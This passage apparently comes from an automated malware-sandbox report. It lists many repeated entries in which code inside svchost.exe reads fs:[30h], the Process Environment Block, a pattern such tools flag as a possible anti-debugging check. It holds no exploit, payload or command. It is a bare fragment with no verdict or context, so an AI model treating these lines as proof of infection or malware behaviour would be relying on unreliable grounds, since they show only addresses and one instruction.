                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A325E0 mov eax, dword ptr fs:[00000030h]2_2_03A325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]2_2_03A6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]2_2_03A6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]2_2_03A6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]2_2_03A6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A365D0 mov eax, dword ptr fs:[00000030h]2_2_03A365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03A6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03A6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6500 mov eax, dword ptr fs:[00000030h]2_2_03AC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]2_2_03A38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]2_2_03A38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A364AB mov eax, dword ptr fs:[00000030h]2_2_03A364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A644B0 mov ecx, dword ptr fs:[00000030h]2_2_03A644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]2_2_03ABA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA49A mov eax, dword ptr fs:[00000030h]2_2_03AEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A304E5 mov ecx, dword ptr fs:[00000030h]2_2_03A304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C427 mov eax, dword ptr fs:[00000030h]2_2_03A2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A430 mov eax, dword ptr fs:[00000030h]2_2_03A6A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]2_2_03A68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]2_2_03A68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]2_2_03A68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC460 mov ecx, dword ptr fs:[00000030h]2_2_03ABC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]2_2_03A5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]2_2_03A5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]2_2_03A5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA456 mov eax, dword ptr fs:[00000030h]2_2_03AEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2645D mov eax, dword ptr fs:[00000030h]2_2_03A2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5245A mov eax, dword ptr fs:[00000030h]2_2_03A5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]2_2_03A40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]2_2_03A40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03AE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03AE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]2_2_03A38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]2_2_03A38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]2_2_03A38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EBFC mov eax, dword ptr fs:[00000030h]2_2_03A5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABCBF0 mov eax, dword ptr fs:[00000030h]2_2_03ABCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]2_2_03A50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]2_2_03A50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]2_2_03A50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]2_2_03A30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]2_2_03A30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]2_2_03A30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADEBD0 mov eax, dword ptr fs:[00000030h]2_2_03ADEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]2_2_03A5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]2_2_03A5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]2_2_03AF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]2_2_03AF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04B00 mov eax, dword ptr fs:[00000030h]2_2_03B04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2CB7E mov eax, dword ptr fs:[00000030h]2_2_03A2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4B4B mov eax, dword ptr fs:[00000030h]2_2_03AE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4B4B mov eax, dword ptr fs:[00000030h]2_2_03AE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]2_2_03AC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]2_2_03AC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFAB40 mov eax, dword ptr fs:[00000030h]2_2_03AFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD8B42 mov eax, dword ptr fs:[00000030h]2_2_03AD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28B50 mov eax, dword ptr fs:[00000030h]2_2_03A28B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADEB50 mov eax, dword ptr fs:[00000030h]2_2_03ADEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]2_2_03A38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]2_2_03A38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86AA4 mov eax, dword ptr fs:[00000030h]2_2_03A86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04A80 mov eax, dword ptr fs:[00000030h]2_2_03B04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68A90 mov edx, dword ptr fs:[00000030h]2_2_03A68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]2_2_03A6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]2_2_03A6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30AD0 mov eax, dword ptr fs:[00000030h]2_2_03A30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]2_2_03A64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]2_2_03A64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA24 mov eax, dword ptr fs:[00000030h]2_2_03A6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EA2E mov eax, dword ptr fs:[00000030h]2_2_03A5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]2_2_03A54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]2_2_03A54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA38 mov eax, dword ptr fs:[00000030h]2_2_03A6CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABCA11 mov eax, dword ptr fs:[00000030h]2_2_03ABCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADEA60 mov eax, dword ptr fs:[00000030h]2_2_03ADEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]2_2_03AACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]2_2_03AACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h]2_2_03A40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h]2_2_03A40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h]2_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h]2_2_03A309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h]2_2_03A309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB89B3 mov esi, dword ptr fs:[00000030h]2_2_03AB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h]2_2_03AB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h]2_2_03AB89B3
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]  2_2_03ABE9E0
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h]  2_2_03A629F9
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h]  2_2_03A629F9
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03AC69C0 mov eax, dword ptr fs:[00000030h]  2_2_03AC69C0
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]  2_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]  2_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]  2_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]  2_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]  2_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]  2_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A649D0 mov eax, dword ptr fs:[00000030h]  2_2_03A649D0
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]  2_2_03AFA9D3
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03AB892A mov eax, dword ptr fs:[00000030h]  2_2_03AB892A
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03AC892B mov eax, dword ptr fs:[00000030h]  2_2_03AC892B
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h]  2_2_03AAE908
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h]  2_2_03AAE908
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03ABC912 mov eax, dword ptr fs:[00000030h]  2_2_03ABC912
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]  2_2_03A28918
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h]  2_2_03A28918
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]  2_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]  2_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h]  2_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]  2_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A7096E mov edx, dword ptr fs:[00000030h]  2_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h]  2_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]  2_2_03AD4978
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h]  2_2_03AD4978
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03ABC97C mov eax, dword ptr fs:[00000030h]  2_2_03ABC97C
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03AB0946 mov eax, dword ptr fs:[00000030h]  2_2_03AB0946
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03B04940 mov eax, dword ptr fs:[00000030h]  2_2_03B04940
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A30887 mov eax, dword ptr fs:[00000030h]  2_2_03A30887
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03ABC89D mov eax, dword ptr fs:[00000030h]  2_2_03ABC89D
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]  2_2_03AFA8E4
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]  2_2_03A6C8F9
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]  2_2_03A6C8F9
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]  2_2_03A5E8C0
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03B008C0 mov eax, dword ptr fs:[00000030h]  2_2_03B008C0
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]  2_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]  2_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]  2_2_03A52835
